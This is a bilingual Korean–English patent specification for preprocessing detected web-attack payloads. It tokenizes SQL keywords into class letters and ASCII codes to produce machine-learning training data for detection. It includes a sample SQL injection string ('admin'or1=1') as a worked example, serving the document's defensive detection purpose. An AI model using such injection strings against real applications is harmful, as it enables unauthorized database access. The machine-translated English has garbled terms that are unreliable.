후술하는 본 발명에 대한 상세한 설명은, 본 발명이 실시될 수 있는 특정 실시예를 예시로서 도시하는 첨부 도면을 참조한다. 이들 실시예는 당업자가 본 발명을 실시할 수 있기에 충분하도록 상세히 설명된다. 본 발명의 다양한 실시예는 서로 다르지만 상호 배타적일 필요는 없음이 이해되어야 한다. 예를 들어, 여기에 기재되어 있는 특정 형상, 구조 및 특성은 일 실시예에 관련하여 본 발명의 정신 및 범위를 벗어나지 않으면서 다른 실시예로 구현될 수 있다. 또한, 각각의 개시된 실시예 내의 개별 구성요소의 위치 또는 배치는 본 발명의 정신 및 범위를 벗어나지 않으면서 변경될 수 있음이 이해되어야 한다. 따라서, 후술하는 상세한 설명은 한정적인 의미로서 취하려는 것이 아니며, 본 발명의 범위는, 적절하게 설명된다면, 그 청구항들이 주장하는 것과 균등한 모든 범위와 더불어 첨부된 청구항에 의해서만 한정된다. 도면에서 유사한 참조부호는 여러 측면에 걸쳐서 동일하거나 유사한 기능을 지칭한다.For a detailed description of the present invention, which will be described later, reference is made to the accompanying drawings that illustrate, by way of example, specific embodiments in which the invention may be practiced. These examples are described in detail enough to enable those skilled in the art to practice the present invention. It should be understood that the various embodiments of the present invention are different, but need not be mutually exclusive. For example, certain shapes, structures, and properties described herein may be implemented in other embodiments without departing from the spirit and scope of the invention in relation to one embodiment. In addition, it should be understood that the location or placement of individual components within each disclosed embodiment can be changed without departing from the spirit and scope of the invention. Therefore, the following detailed description is not intended to be taken in a limiting sense, and the scope of the present invention, if appropriately described, is limited only by the appended claims, along with all ranges equivalent to those claimed. In the drawings, similar reference numerals refer to the same or similar functions across various aspects.

이하, 본 발명이 속하는 기술분야에서 통상의 지식을 가진 자가 본 발명을 용이하게 실시할 수 있도록 하기 위하여, 본 발명의 바람직한 실시예들에 관하여 첨부된 도면을 참조하여 상세히 설명하기로 한다.Hereinafter, preferred embodiments of the present invention will be described in detail with reference to the accompanying drawings in order to enable those skilled in the art to easily implement the present invention.

또한, 본 발명에서 "패턴"은 웹 공격 종류 및 공격이 이루어질 수 있는 명령어의 형태를 모두 포함하는 의미로 사용되었으며, "유형"은 서로 다른 웹 공격의 종류를 의미하는 것으로 사용되었다.In addition, in the present invention, "pattern" was used to mean both the type of the web attack and the type of the command that can be attacked, and "type" was used to mean the type of different web attacks.

도 1은, 보안 위협 탐지 시스템이 웹 공격을 탐지하여 탐지된 웹 공격에 대한 정보를 기계학습 시스템에 학습 데이터로 제공하는 기존 방법의 개략적인 구성을 설명하기 위한 예시를 나타내는 도면이다.FIG. 1 is a diagram illustrating an example of a schematic configuration of an existing method in which a security threat detection system detects a web attack and provides information about the detected web attack as learning data to a machine learning system.

기존의 방법은, 사전에 웹 공격 유형별로 해당하는 명령어들을 분류해 놓고, 실제로 웹 공격이 탐지되어 탐지된 데이터에 포함된 단어 중 하나가 상기 웹 공격 유형별로 분류된 명령어들 중 하나에 해당하기만 하면 기계학습 시스템에 학습 데이터로 제공하였다.In the conventional method, commands corresponding to each web attack type are classified in advance, and one of the words included in the detected data by detecting the web attack corresponds to one of the commands classified by the web attack type. Then, it was provided as learning data to the machine learning system.

예를 들어, 도 1을 참조하여 설명하면, 웹 공격 분류(110)가 Cross-Site Scripting(111), SQL Injection(112), File upload(113) 등으로 나뉘어 있고, 실제로 보안 위협 탐지 시스템에 탐지된 웹 공격 데이터에 "select"가 포함되어 있다면, 상기 "select"는 SQL Injection(112)으로 분류된 명령어 중 하나이므로, 탐지된 웹 공격 데이터의 웹 공격의 유형은 SQL Injection(112)에 해당하고, 상기 "select"를 포함하는 공격이라고 판단되어 기계학습 시스템에 제공될 것이다.For example, referring to FIG. 1, the web attack classification 110 is divided into Cross-Site Scripting (111), SQL Injection (112), and File upload (113), and is actually detected by the security threat detection system. If "select" is included in the web attack data, the "select" is one of the commands classified as SQL Injection (112), so the web attack type of the detected web attack data corresponds to SQL Injection (112). , It is determined that the attack includes the "select" and will be provided to the machine learning system.

다만, 만약에 웹 공격의 대상이 DB 시스템이라면, DB 시스템에서 "select"는 단독으로 수행될 수 없는 명령어이고 "from"과 조합이 되어야 하는데, 탐지된 웹 공격 데이터에 "select"는 포함되어 있지만 "from"이 포함되어 있지 않은 경우에도, 상기와 같이 탐지된 웹 공격 데이터의 웹 공격의 유형은 SQL Injection(112)에 해당하고, "select"를 포함하는 공격이라고 판단되어 기계학습 시스템에 제공되어 불필요한 데이터까지 학습하게 되는 문제가 생길 수 있다.However, if the target of a web attack is a DB system, "select" is a command that cannot be performed alone and must be combined with "from" in the DB system. "Select" is included in the detected web attack data. Even if "from" is not included, the web attack type of the web attack data detected as described above corresponds to SQL Injection 112 and is determined to be an attack that includes "select" and is provided to the machine learning system. This can lead to the problem of learning unnecessary data.

따라서, 이하에서는 이와 같은 문제점을 개선한 본 발명에 대해 구체적으로 설명하기로 한다.Therefore, hereinafter, the present invention, which has improved such problems, will be described in detail.

도 2는 본 발명의 일 실시예에 따른 기계학습 대상 시스템의 명령어를 기반으로 웹 공격 패턴을 추출하여 재구성 페이로드 데이터를 생성하는 전처리기(200)의 개략적인 구성을 나타내는 도면이다.FIG. 2 is a diagram showing a schematic configuration of a preprocessor 200 that generates reconstruction payload data by extracting a web attack pattern based on a command of a machine learning target system according to an embodiment of the present invention.

도 2에 도시된 바와 같이, 본 발명의 전처리기(200)는 메모리(210) 및 프로세서(220)를 포함할 수 있다.As illustrated in FIG. 2, the preprocessor 200 of the present invention may include a memory 210 and a processor 220.

전처리기(200)의 메모리(210)는 프로세서(220)의 인스트럭션들을 저장할 수 있는데, 구체적으로, 인스트럭션들은 전처리기(200)로 하여금 특정의 방식으로 기능하게 하기 위한 목적으로 생성되는 코드로서, 컴퓨터 기타 프로그램 가능한 데이터 프로세싱 장비를 지향할 수 있는 컴퓨터 이용 가능 또는 컴퓨터 판독 가능 메모리에 저장될 수 있다. 인스트럭션들은 본 발명의 명세서에서 설명되는 기능들을 실행하기 위한 프로세스들을 수행할 수 있다.The memory 210 of the pre-processor 200 may store instructions of the processor 220. Specifically, instructions are codes generated for the purpose of causing the pre-processor 200 to function in a specific way. It may be stored in computer-readable or computer-readable memory capable of directing other programmable data processing equipment. Instructions can perform processes for performing the functions described in the specification of the present invention.

그리고, 전처리기(200)의 프로세서(220)는 MPU(Micro Processing Unit) 또는 CPU(Central Processing Unit), 캐쉬 메모리(Cache Memory), 데이터 버스(Data Bus) 등의 하드웨어 구성을 포함할 수 있다. 또한, 운영체제, 특정 목적을 수행하는 애플리케이션의 소프트웨어 구성을 더 포함할 수도 있다.In addition, the processor 220 of the preprocessor 200 may include hardware configurations such as a micro processing unit (MPU) or a central processing unit (CPU), a cache memory, and a data bus. Also, it may further include a software configuration of an operating system and an application performing a specific purpose.

또한, 전처리기(200)는 기계학습 대상 시스템의 명령어를 기반으로 웹 공격 패턴을 추출하여 재구성 페이로드 데이터를 생성하는 데 사용되는 정보를 포함하는 데이터베이스(900)와 연동될 수 있다. 여기서, 데이터베이스(900)는 플래시 메모리 타입(flash memory type), 하드디스크 타입(hard disk type), 멀티미디어 카드 마이크로 타입(multimedia card micro type), 카드 타입의 메모리(예를 들어 SD 또는 XD 메모리), 램(Random Access Memory, RAM), SRAM(Static Random Access Memory), 롬(ReadOnly Memory, ROM), EEPROM(Electrically Erasable Programmable ReadOnly Memory), PROM(Programmable ReadOnly Memory), 자기 메모리, 자기 디스크, 광디스크 중 적어도 하나의 타입의 저장매체를 포함할 수 있으며, 이에 한정되지 않으며 데이터를 저장할 수 있는 모든 매체를 포함할 수 있다. 또한, 데이터베이스(900)는 전처리기(200)와 분리되어 설치되거나, 이와는 달리 전처리기(200)의 내부에 설치되어 데이터를 전송하거나 수신되는 데이터를 기록할 수도 있고, 도시된 바와 달리 둘 이상으로 분리되어 구현될 수도 있으며, 이는 발명의 실시 조건에 따라 달라질 수 있다.In addition, the pre-processor 200 may be interlocked with the database 900 including information used to generate a reconstruction payload data by extracting a web attack pattern based on a command of a machine learning target system. Here, the database 900 is a flash memory type (flash memory type), hard disk type (hard disk type), multimedia card micro type (multimedia card micro type), card type memory (for example, SD or XD memory), At least one of Random Access Memory (RAM), Static Random Access Memory (SRAM), ReadOnly Memory (ROM), Electrically Erasable Programmable ReadOnly Memory (EEPROM), Programmable ReadOnly Memory (PROM), magnetic memory, magnetic disk, and optical disk It may include one type of storage medium, but is not limited thereto, and may include any medium capable of storing data. In addition, the database 900 may be installed separately from the preprocessor 200, or alternatively, may be installed inside the preprocessor 200 to record data to be transmitted or received. It may be implemented separately, it may vary depending on the implementation conditions of the invention.

이와 같은 전처리기(200)를 사용하여 기계학습 대상 시스템의 명령어를 기반으로 웹 공격 패턴을 추출하여 재구성 페이로드 데이터를 생성하기 위해서는, 기계학습 대상 시스템에 포함된 복수의 명령어 각각이 복수의 웹 공격 유형별로 명령어의 조합을 구성하는 각각의 구성요소에 따라 나뉘어진 복수의 클래스 중 적어도 하나에 속한 채로 데이터베이스(900)에 저장되는 것이 선행되어야 한다. 이때, 상기 복수의 클래스 각각은 클래스별로 서로 다른 각각의 제1 문자로 정의되어 있을 수 있으나, 이에 한정되지 않고 서로 다른 웹 공격 유형에 포함된 클래스 간에는 서로 동일한 제1 문자로 정의될 수도 있을 것이다. 이를 도 3을 참조하여 설명하면 다음과 같다.In order to extract the web attack pattern based on the instructions of the machine learning target system using the preprocessor 200 and generate the reconstructed payload data, each of the plurality of instructions included in the machine learning target system attacks a plurality of web attacks. It should be preceded that it is stored in the database 900 while belonging to at least one of a plurality of classes divided according to each component constituting a combination of instructions for each type. In this case, each of the plurality of classes may be defined as a first character that is different for each class, but is not limited thereto, and may be defined as the same first character between classes included in different web attack types. This will be described with reference to FIG. 3.

도 3은, 본 발명의 일 실시예에 따른, 보안 위협 탐지 시스템이 웹 공격을 탐지하여 탐지된 웹 공격에 대한 정보를 기계학습 시스템에 학습 데이터로 제공하는 방법의 개략적인 구성을 설명하기 위한 예시를 나타내는 도면이다.FIG. 3 is an example for explaining a schematic configuration of a method for a security threat detection system to detect a web attack and provide information on the detected web attack as training data to a machine learning system according to an embodiment of the present invention. It is a figure showing.

도 3을 참조하면, 웹 공격 분류(330)는 Cross-Site Scripting(331), SQL Injection(332), File download(333), File upload(334) 등을 포함할 수 있으나, 이에 한정되지 않고 웹 공격에 해당하는 모든 유형의 웹 공격을 포함할 수 있을 것이다.3, the web attack classification 330 may include Cross-Site Scripting (331), SQL Injection (332), File download (333), File upload (334), but is not limited thereto. It could include any type of web attack that could be an attack.

이때, 상기 Cross-Site Scripting(331)에 해당하는 명령어 각각은 명령어 조합을 구성하는 각각의 구성요소에 따라 각각 알파벳 A, B, C 및 D로 정의된 클래스인 A Class, B Class, C Class 및 D Class 로 나뉘어 데이터베이스(900)에 저장될 수 있으나, 이에 한정되는 않고 명령어 조합에 따라 더 많은 클래스로 나뉘어 데이터베이스(900)에 저장될 수도 있을 것이다. At this time, each of the commands corresponding to the Cross-Site Scripting 331 is A Class, B Class, C Class, which is a class defined by A, B, C, and D, respectively, according to each component constituting the command combination. It may be divided into D Class and stored in the database 900, but is not limited thereto, and may be divided into more classes and stored in the database 900 according to a combination of instructions.

또한, 상기 SQL Injection(332)에 해당하는 명령어 각각은 명령어 조합을 구성하는 각각의 구성요소에 따라 각각 알파벳 A, B, C 및 D로 정의된 클래스인 A Class, B Class, C Class 및 D Class로 나뉘어 데이터베이스(900)에 저장될 수 있으나, 이에 한정되는 않고 명령어 조합에 따라 더 많은 클래스로 나뉘어 데이터베이스(900)에 저장될 수도 있을 것이다.In addition, each of the commands corresponding to the SQL Injection 332 is A Class, B Class, C Class, and D Class, which are classes defined by alphabets A, B, C, and D, respectively, according to each component constituting the command combination. It may be divided into and stored in the database 900, but is not limited thereto, and may be divided into more classes and stored in the database 900 according to a combination of commands.

또한, 상기 SQL Injection(332)의 A Class에 "select"가, B Class에 "from"이, C Class에 "where"이, D Class에 "or"가 저장되어 있는 것과 같이 명령어 조합을 구성하는 각각의 구성요소에 따라 하나의 클래스에 조합된 명령어 중 하나의 명령어가 저장될 수 있으나, 이에 한정되지 않고 A Class "select" 및 "from"이 저장되고, B Class에 "where" 및 "or"가 저장되는 것과 같이 명령어 조합을 구성하는 각각의 구성요소 중 적어도 두 개의 명령어가 저장될 수도 있을 것이다.In addition, the command combinations such as “select” in A Class, “from” in B Class, “where” in C Class, and “or” in D Class are stored in the SQL Class of the SQL Injection 332. According to each component, one instruction among commands combined in one class may be stored, but is not limited thereto. A Class "select" and "from" are stored, and "where" and "or" are stored in B Class. At least two instructions of each component constituting the instruction combination may be stored as is stored.

상술한 바와 같이, 기계학습 대상 시스템에 포함된 복수의 명령어 각각이 복수의 웹 공격 유형별로 명령어의 조합을 구성하는 각각의 구성요소에 따라 나뉘어진 복수의 클래스 중 적어도 하나에 속한 채로 데이터베이스(900)에 저장되어 있는 상태에서, 전처리기(200)에 의해 기계학습 대상 시스템의 명령어를 기반으로 웹 공격 패턴을 추출하여 재구성 페이로드 데이터를 생성하기 위한 방법을 도 4를 참조하여 설명하면 다음과 같다.As described above, each of a plurality of instructions included in the machine learning target system belongs to at least one of a plurality of classes divided according to each component constituting a combination of instructions for each type of web attack database 900 A method for extracting a web attack pattern based on the instruction of the machine learning target system by the preprocessor 200 and generating the reconstructed payload data in the state stored in the following description with reference to FIG. 4 is as follows.

먼저, 전처리기(200)는, 페이로드 데이터를 획득할 수 있다(S410). First, the preprocessor 200 may acquire payload data (S410).

이때, 페이로드 데이터는 보안 위협 탐지 시스템에 의해 탐지된 보안 위협 데이터에 포함되어 있을 것이다. At this time, the payload data will be included in the security threat data detected by the security threat detection system.

또한, 상기 보안 위협 데이터는 데이터베이스(900)에 저장되어 있는 복수의 웹 공격 유형 중 적어도 하나에 대응되는 특정 웹 공격 유형에 해당될 수 것이다.In addition, the security threat data may correspond to a specific web attack type corresponding to at least one of a plurality of web attack types stored in the database 900.

여기서, 상기 보안 위협 탐지 시스템은, 상기 탐지된 보안 위협 데이터에 포함된 복수의 탐지 로그 데이터를 수집하고, 상기 수집된 복수의 탐지 로그 데이터를 통해 상기 복수의 웹 공격 유형 중 상기 특정 웹 공격 유형인 것으로 결정할 수 있을 것이다.Here, the security threat detection system collects a plurality of detection log data included in the detected security threat data, and is the specific web attack type among the plurality of web attack types through the collected plurality of detection log data. Will be able to decide.

그리고, 전처리기(200)는, 상기 획득한 페이로드 데이터를 특수문자를 기준으로 상기 획득한 페이로드 데이터에 포함되어 있는 문자, 상기 특수문자 및 숫자 중 적어도 일부를 토크나이징할 수 있다(S420). In addition, the preprocessor 200 may talkize at least some of the characters, the special characters, and numbers included in the obtained payload data based on the special payload data (S420). ).

예를 들어, 획득한 페이로드 데이터가 select id,pw from table where id=admin'or1=1 이라고 한다면, 전처리기(200)는 해당 페이로드에 포함된 특수문자를 기준으로 select id , pw from table where id = admin ' or1 = 1 과 같이 토크나이징할 수 있을 것이다. 다만, 상기와 같이 특수문자를 기준으로 특수문자 전후로 띄어쓰기를 사용하여 표현한 것은 토크나이징된 것을 표현하기 위한 것일 뿐, 이에 한정되는 것을 아닐 것이다.For example, if the obtained payload data is select id, pw from table where id = admin'or1 = 1, the preprocessor 200 select select, pw from table based on special characters included in the payload. You can talk to where id = admin 'or1 = 1. However, the expression using spaces before and after the special character based on the special character as described above is only for expressing the talked and not limited thereto.

다음으로, 전처리기(200)는, 상기 토크나이징된 문자, 상기 토크나이징된 특수문자 및 상기 토크나이징된 숫자 중 상기 데이터베이스(900)에 저장되어 있는 상기 특정 웹 공격 유형에 해당하는 복수의 명령어를 구성하는 복수의 특정 문자 그룹을 선택할 수 있다(S430).Next, the pre-processor 200, the tokenized characters, the tokenized special characters, and the plurality of tokenized numbers stored in the database 900 among the tokenized numbers A plurality of specific character groups constituting the command may be selected (S430).

예를 들어, 토크나이징된 페이로드 데이터가 select id , pw from table where id = admin ' or1 = 1 이고, 복수의 명령어 각각이 도 3에 나타나 있는 것과 같이 데이터베이스(900)에 저장되어 있다고 가정하면, 전처리기(200)는, 상기 select id , pw from table where id = admin ' or1 = 1 중에서 특정 웹 공격 유형인 SQL Injection(332)에 포함된 복수의 명령어를 각각 구성하는 복수의 특정 문자 그룹인 "select", "from", "where" 및 "or"를 선택할 수 있을 것이다.For example, assuming that the tokenized payload data is select id, pw from table where id = admin 'or1 = 1, and each of a plurality of commands is stored in the database 900 as shown in FIG. 3. , The preprocessor 200 is a group of a plurality of specific characters constituting a plurality of commands included in a specific web attack type SQL Injection 332 among the select id, pw from table where id = admin 'or1 = 1 You will be able to select "select", "from", "where" and "or".

다음으로, 전처리기(200)는, 상기 복수의 특정 문자 그룹이 상기 특정 웹 공격 유형의 특정 명령어 조합을 구성하는 각각의 구성요소에 해당되는지 여부를 판단하고, 상기 복수의 특정 문자 그룹이 상기 특정 웹 공격 유형의 상기 특정 명령어 조합을 구성하는 각각의 구성요소에 해당되면, 상기 복수의 특정 문자 그룹 각각을 이에 해당되는 각각의 클래스를 나타내는 각각의 특정 제1 문자로 치환하고, 상기 토크나이징된 문자, 상기 토크나이징된 특수문자 및 상기 토크나이징된 숫자 중 상기 복수의 특정 문자 그룹 및 상기 특수문자를 제외한 나머지를 상기 페이로드 데이터에서 제거할 수 있다(S440).Next, the preprocessor 200 determines whether the plurality of specific character groups correspond to each component constituting a specific command combination of the specific web attack type, and the plurality of specific character groups are specified. When each component constituting the specific command combination of the web attack type is replaced, each of the plurality of specific character groups is replaced with each specific first character representing each class corresponding thereto, and the tokenized The rest of the characters, except for the plurality of specific character groups and the special characters, among the tokenized special characters and the tokenized numbers may be removed from the payload data (S440).

이때, 상기 제1 문자는 실수 또는 실수로 치환될 수 있는 문자일 수 있을 것이다. 여기서 상기 실수 또는 상기 실수로 치환될 수 있는 문자에는 알파벳이 포함될 수 있을 것이다.In this case, the first character may be a character that can be replaced by a real number or a real number. Here, an alphabet may be included in a character that can be replaced by the real number or the real number.

예를 들어, 도 3에 나타나 있는 것과 같이 복수의 명령어 각각이 데이터베이스(900)에 저장되어 있고, 토크나이징된 페이로드 데이터인 select id , pw from table where id = admin ' or1 = 1 이라면, 복수의 특정 문자 그룹은 "select", "from", "where" 및 "or"이 되고, 복수의 특정 문자 그룹인 "select", "from", "where" 및 "or"는 도 3에 나타나 있는 특정 웹 공격 유형인 SQL Injection(332)의 명령어 조합을 구성하는 각각의 구성요소에 해당되므로 "select"는 알파벳 A로, "from"은 알파벳 B로, "where"은 알파벳 C로, "or"는 알파벳 D로 치환될 수 있을 것이다. 또한, 토크나이징된 페이로드 데이터인 select id , pw from table where id = admin ' or1 = 1 중에서 복수의 특정 문자 그룹인 "select", "from", "where" 및 "or"와 특수문자인 ",", "=", "'" 및 "="을 제외한 나머지를 제거할 수 있을 것이다. 따라서, 토크나이징된 페이로드 데이터인 select id , pw from table where id = admin ' or1 = 1 은 S440 단계를 거쳐 A,BC='D=으로 표현될 수 있을 것이다.For example, as shown in FIG. 3, if each of a plurality of commands is stored in the database 900, and if select id, pw from table where id = admin 'or1 = 1, the tokenized payload data, the plurality of commands Specific character groups of "select", "from", "where" and "or", and a plurality of specific character groups "select", "from", "where" and "or" are shown in FIG. Since each component that constitutes a command combination of a specific web attack type, SQL Injection (332), corresponds to each component, "select" is alphabet A, "from" is alphabet B, "where" is alphabet C, and "or" May be replaced with the alphabet D. In addition, among the tokenized payload data select id, pw from table where id = admin 'or1 = 1, a plurality of specific character groups "select", "from", "where" and "or" and special characters Anything other than ",", "=", "'" and "=" may be removed. Accordingly, select id, pw from table where id = admin 'or1 = 1, which is the tokenized payload data, may be expressed as A, BC =' D = through step S440.

이때, 전처리기(200)는, 상기 복수의 특정 문자 그룹이 상기 특정 웹 공격 유형의 특정 명령어 조합을 구성하는 각각의 구성요소에 해당되는지 여부를 판단하고, 상기 복수의 특정 문자 그룹이 상기 특정 웹 공격 유형의 상기 특정 명령어 조합을 구성하는 각각의 구성요소에 해당되면, 상기 복수의 특정 문자 그룹 각각을 이에 해당되는 각각의 클래스를 나타내는 각각의 특정 제1 문자로 치환한 후에, 상기 토크나이징된 문자, 상기 토크나이징된 특수문자 및 상기 토크나이징된 숫자 중 상기 복수의 특정 문자 그룹 및 상기 특수문자를 제외한 나머지를 상기 페이로드 데이터에서 제거할 수 있을 것이나 이에 한정되는 것은 아닐 것이다. At this time, the preprocessor 200 determines whether the plurality of specific character groups correspond to each component constituting a specific command combination of the specific web attack type, and the plurality of specific character groups are the specific web When each component constituting the specific instruction combination of the attack type is replaced, each of the plurality of specific character groups is replaced with each specific first character representing each class corresponding thereto, and then the tokenized The rest of the characters, except for the plurality of specific character groups and the special characters among the tokenized special characters and the tokenized numbers, may be removed from the payload data, but will not be limited thereto.

따라서, 전처리기(200)는, 상기 토크나이징된 문자, 상기 토크나이징된 특수문자 및 상기 토크나이징된 숫자 중 상기 복수의 특정 문자 그룹 및 상기 특수문자를 제외한 나머지를 상기 페이로드 데이터에서 제거한 후에, 상기 복수의 특정 문자 그룹이 상기 특정 웹 공격 유형의 특정 명령어 조합을 구성하는 각각의 구성요소에 해당되는지 여부를 판단하고, 상기 복수의 특정 문자 그룹이 상기 특정 웹 공격 유형의 상기 특정 명령어 조합을 구성하는 각각의 구성요소에 해당되면, 상기 복수의 특정 문자 그룹 각각을 이에 해당되는 각각의 클래스를 나타내는 각각의 특정 제1 문자로 치환할 수도 있을 것이다. Accordingly, the preprocessor 200, from the payload data, excludes the plurality of specific character groups and the special characters from the tokenized characters, the tokenized special characters, and the tokenized numbers from the payload data. After removal, it is determined whether the plurality of specific character groups correspond to each component constituting a specific command combination of the specific web attack type, and the plurality of specific character groups are the specific command of the specific web attack type If it corresponds to each component constituting the combination, each of the plurality of specific character groups may be replaced with each specific first character representing each class corresponding thereto.

다음으로, 전처리기(200)는, 치환된 각각의 특정 제1 문자 및 상기 특수문자를 실수 또는 상기 실수에 대응되는 제2 문자로 치환하여 재구성 페이로드 데이터를 생성할 수 있을 것이다(S450).Next, the preprocessor 200 may generate reconstructed payload data by substituting each specific first character and the special character substituted with a real number or a second character corresponding to the real number (S450).

이때, 상기 제2 문자는 기계학습에 사용될 수 있는 문자일 수 있을 것이다. 여기서, 기계학습에 사용될 수 있는 문자에는 아스키 코드, 핵사코드 등이 포함될 수 있으나, 이에 한정되는 것은 아닐 것이다.In this case, the second character may be a character that can be used for machine learning. Here, characters that can be used for machine learning may include ASCII codes and nuclear death codes, but are not limited thereto.

또한, 제1 문자가 알파벳이고, 제2 문자가 아스키 코드일 경우, 알파벳 및 특수문자는 ASCII Table을 이용하여 치환될 수 있을 것이다. 이때, ASCII Table은 널리 알려져 있고, 검색에 의해 쉽게 알 수 있으므로 설명을 생략하도록 하겠다. Also, if the first character is an alphabet and the second character is an ASCII code, the alphabet and special characters may be substituted using an ASCII table. At this time, the ASCII table is widely known and can be easily understood by searching, so the description will be omitted.

예를 들어, 제1 문자가 알파벳이고, 제2 문자가 아스키 코드일 경우, 상기 S440 단계를 거쳐 A,BC='D=으로 표현된 페이로드 데이터는 ASCII Table을 이용하여 65 44 66 67 61 39 68 61로 치환될 수 있을 것이다.For example, when the first character is an alphabet and the second character is an ASCII code, the payload data expressed as A, BC = 'D = through the step S440 is 65 44 66 67 61 39 68 61.

한편, 전처리기(200)는, 상기 S410 내지 S450으로 이루어지는 단계를 수행한 후, 생성된 재구성 페이로드 데이터가 기계학습장치에 입력되도록 지원할 수 있을 것이다.Meanwhile, the preprocessor 200 may support the generated reconfiguration payload data to be input to the machine learning apparatus after performing steps S410 to S450.

한편, 전처리기(200)는, 상기 S440 단계에서, 상기 복수의 특정 문자 그룹 중 일부 특정 문자 그룹에 대해 상기 특정 웹 공격 유형의 상기 특정 명령어 조합을 구성하는 각각의 구성요소 중 적어도 하나에 해당되는지 여부를 판단하고, 상기 일부 특정 문자 그룹이 상기 특정 웹 공격 유형의 상기 특정 명령어 조합을 구성하는 각각의 구성요소 중 적어도 하나에 해당되면, 상기 일부 특정 문자 그룹을 이에 해당되는 클래스를 나타내는 특정 제1-1 문자로 치환한 후, 상기 복수의 특정 문자 그룹 중 나머지 일부 특정 문자 그룹에 대해 상기 특정 웹 공격 유형의 상기 특정 명령어 조합을 구성하는 각각의 구성요소 중 나머지에 해당되는지 여부를 판단하고, 상기 나머지 일부 특정 문자 그룹이 상기 특정 웹 공격 유형의 상기 특정 명령어 조합을 구성하는 각각의 구성요소 중 나머지에 해당되면, 상기 나머지 일부 특정 문자 그룹을 이에 해당되는 클래스를 나타내는 제1-2 문자로 치환할 수 있을 것이다. 여기서, 제1-1 문자 및 제1-2 문자는 상기 특정 제1 문자에 포함될 수 있을 것이다, 또한, 상기에는 제1-1 문자 및 제1-2 문자만을 기재하였으나 이에 한정되지 않고 필요에 따라 제1-3 문자, 제1-4 문자 등이 더 포함될 수 있을 것이다.Meanwhile, in step S440, the preprocessor 200 corresponds to at least one of respective components constituting the specific command combination of the specific web attack type for some specific character group among the plurality of specific character groups. When determining whether or not the specific character group corresponds to at least one of each component constituting the specific command combination of the specific web attack type, the specific first specific character group represents a class corresponding thereto. After substituting with -1 character, it is determined whether or not it corresponds to the rest of each component constituting the specific command combination of the specific web attack type for some other specific character group among the plurality of specific character groups, and Each of the other specific character groups constitutes the specific command combination of the specific web attack type. If it corresponds to the rest of the components, some of the other specific character groups may be replaced with 1-2 characters representing the corresponding class. Here, the 1-1 character and the 1-2 character may be included in the specific first character. In addition, only the 1-1 character and the 1-2 character are described above, but the present invention is not limited thereto. The first-3 characters, the first-4 characters, etc. may be further included.

예를 들어, 복수의 특정 문자 그룹이 "select", "from", "where" 및 "or"라고 가정하면, 전처리기(200)는, "select", "from", "where" 및 "or" 중 먼저 "select"및 "from" 각각이 도 3에 나타나 있는 특정 웹 공격 유형인 SQL Injection(332)의 명령어 조합을 구성하는 각각의 구성요소에 해당되는지 판단하여 "select"및 "from" 각각이 해당되는 클래스를 나타내는 알파벳 A 및 알파벳 B로 치환할 수 있다. 그리고, 전처리기(200)는, 이후에 "where" 및 "or" 각각이 상기 SQL Injection(332)의 명령어 조합을 구성하는 구성요소 각각의 구성요소에 해당되는지 판단하여 "where" 및 "or" 각각이 해당되는 클래스를 나타내는 알파벳 C 및 알파벳 D로 치환할 수 있을 것이다. 여기서, 제1 문자는 알파벳이고, 제1-1 문자는 A, 제1-2 문자는 B, 제1-3 문자는 C, 제1-4 문자는 D일 것이다. 여기서, 복수의 특정 문자 그룹은 명령어 수행순서에 따라 순차적으로 치환될 수 있으나, 이에 한정되는 것은 아닐 것이다. For example, assuming that a plurality of specific character groups are “select”, “from”, “where”, and “or”, the preprocessor 200 may select “select”, “from”, “where”, and “or” First, "select" and "from" are judged to correspond to each component constituting the command combination of the specific web attack type SQL Injection 332 shown in FIG. 3, and "select" and "from" respectively. It can be substituted with the alphabet A and the alphabet B representing the corresponding class. Then, the preprocessor 200 then determines whether "where" and "or" respectively correspond to the respective components of the components constituting the command combination of the SQL Injection 332, "where" and "or" Each may be replaced with the letter C and the letter D, representing the corresponding class. Here, the first character will be the alphabet, the 1-1 character will be A, the 1-2 character will be B, the 1-3 character will be C, and the 1-4 character will be D. Here, the plurality of specific character groups may be sequentially substituted according to the order of execution of the command, but will not be limited thereto.

한편, 전처리기(200)는, 상기 S440 단계에서, 상기 복수의 특정 문자 그룹이 상기 특정 웹 공격 유형의 상기 특정 명령어 조합을 구성하는 각각의 구성요소에 해당되는지 여부를 판단한 후, 상기 복수의 특정 문자 그룹이 상기 특정 웹 공격 유형의 상기 특정 명령어 조합을 구성하는 각각의 구성요소에 해당되면, 상기 복수의 특정 문자 그룹 각각을 이에 해당되는 각각의 클래스를 나타내는 각각의 제1-1 문자 및 제1-2 문자로 치환할 수도 있을 것이다. 여기서, 제1-1 문자 및 제1-2 문자는 상기 특정 제1 문자에 포함될 수 있을 것이다, 또한, 상기에는 제1-1 문자 및 제1-2 문자만을 기재하였으나 이에 한정되지 않고 필요에 따라 제1-3 문자, 제1-4 문자 등이 더 포함될 수 있을 것이다.Meanwhile, in step S440, the preprocessor 200 determines whether the plurality of specific character groups correspond to respective components constituting the specific command combination of the specific web attack type, and then determines the plurality of specific characters. If the character group corresponds to each component constituting the specific command combination of the specific web attack type, each of the first-first characters and first characters representing each class corresponding to each of the plurality of specific character groups. It could be replaced with -2 characters. Here, the 1-1 character and the 1-2 character may be included in the specific first character. In addition, only the 1-1 character and the 1-2 character are described above, but the present invention is not limited thereto. The first-3 characters, the first-4 characters, etc. may be further included.

예를 들어, 복수의 특정 문자 그룹이 "select", "from", "where" 및 "or"라고 가정하면, 전처리기(200)는, "select", "from", "where" 및 "or"가 도 3에 나타나 있는 특정 웹 공격 유형인 SQL Injection(332)의 명령어 조합을 구성하는 각각의 구성요소에 해당되는지 모두 판단한 후, "select", "from", "where" 및 "or" 각각이 해당되는 클래스를 나타내는 알파벳 A, 알파벳 B, 알파벳 C 및 알파벳 D 로 각각 치환할 수 있을 것이다. 즉, "select"는 알파벳 A로, 상기 "from"은 알파벳 B로, 상기 "where"은 알파벳 C로, 상기 "or"은 알파벳 D로 치환될 수 있을 것이다. 여기서, 복수의 특정 문자 그룹은 명령어 수행순서에 따라 순차적으로 치환될 수 있으나, 이에 한정되는 것은 아닐 것이다. For example, assuming that a plurality of specific character groups are “select”, “from”, “where”, and “or”, the preprocessor 200 may select “select”, “from”, “where”, and “or” After determining whether "corresponds to each component constituting the command combination of the specific web attack type SQL Injection 332 shown in FIG. 3," select "," from "," where "and" or "respectively Alphabet A, alphabet B, alphabet C, and alphabet D representing the corresponding class may be substituted, respectively. That is, "select" may be replaced by alphabet A, "from" may be replaced by alphabet B, "where" may be replaced by alphabet C, and "or" may be replaced by alphabet D. Here, the plurality of specific character groups may be 